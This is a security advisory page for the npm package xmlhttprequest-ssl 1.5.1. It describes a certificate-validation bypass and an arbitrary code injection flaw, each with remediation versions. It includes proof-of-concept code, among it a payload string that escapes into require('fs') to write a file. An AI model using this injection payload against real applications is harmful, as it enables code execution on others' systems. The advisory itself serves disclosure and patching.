xmlhttprequest-ssl@1.5.1

Vulnerabilities

2 via 2 paths

Dependencies

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 2
Status
  • 2
  • 0
  • 0

high severity

Access Restriction Bypass

  • Vulnerable module: xmlhttprequest-ssl
  • Introduced through: xmlhttprequest-ssl@1.5.1

Detailed paths

  • Introduced through: xmlhttprequest-ssl@1.5.1
    Remediation: Upgrade to xmlhttprequest-ssl@1.6.1.

Overview

xmlhttprequest-ssl is a fork of xmlhttprequest.

Affected versions of this package are vulnerable to Access Restriction Bypass. The package disables SSL certificate validation by default, because rejectUnauthorized (when the property exists but is undefined) is considered to be false within the https.request function of Node.js. In other words, no certificate is ever rejected.

PoC

const XMLHttpRequest = require('xmlhttprequest-ssl');

var xhr = new XMLHttpRequest();        /* pass empty object in version 1.5.4 to work around bug */

xhr.open("GET", "https://self-signed.badssl.com/");
xhr.addEventListener('readystatechange', () => console.log('ready state:', xhr.status));
xhr.addEventListener('loadend', loadend);

function loadend()
{
  console.log('loadend:', xhr);
  if (xhr.status === 0 && xhr.statusText.code === 'DEPTH_ZERO_SELF_SIGNED_CERT')
    console.log('test passed: self-signed cert rejected');
  else
    console.log('*** test failed: self-signed cert used to retrieve content');
}

xhr.send();

Remediation

Upgrade xmlhttprequest-ssl to version 1.6.1 or higher.

References

high severity

Arbitrary Code Injection

  • Vulnerable module: xmlhttprequest-ssl
  • Introduced through: xmlhttprequest-ssl@1.5.1

Detailed paths

  • Introduced through: xmlhttprequest-ssl@1.5.1
    Remediation: Upgrade to xmlhttprequest-ssl@1.6.2.

Overview

xmlhttprequest-ssl is a fork of xmlhttprequest.

Affected versions of this package are vulnerable to Arbitrary Code Injection. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.

POC

const { XMLHttpRequest } = require("xmlhttprequest")

const xhr = new XMLHttpRequest()
xhr.open("POST", "http://localhost.invalid/", false /* use synchronize request */)
xhr.send("\\');require(\"fs\").writeFileSync(\"/tmp/aaaaa.txt\", \"poc-20210306\");req.end();//")

Remediation

Upgrade xmlhttprequest-ssl to version 1.6.2 or higher.

References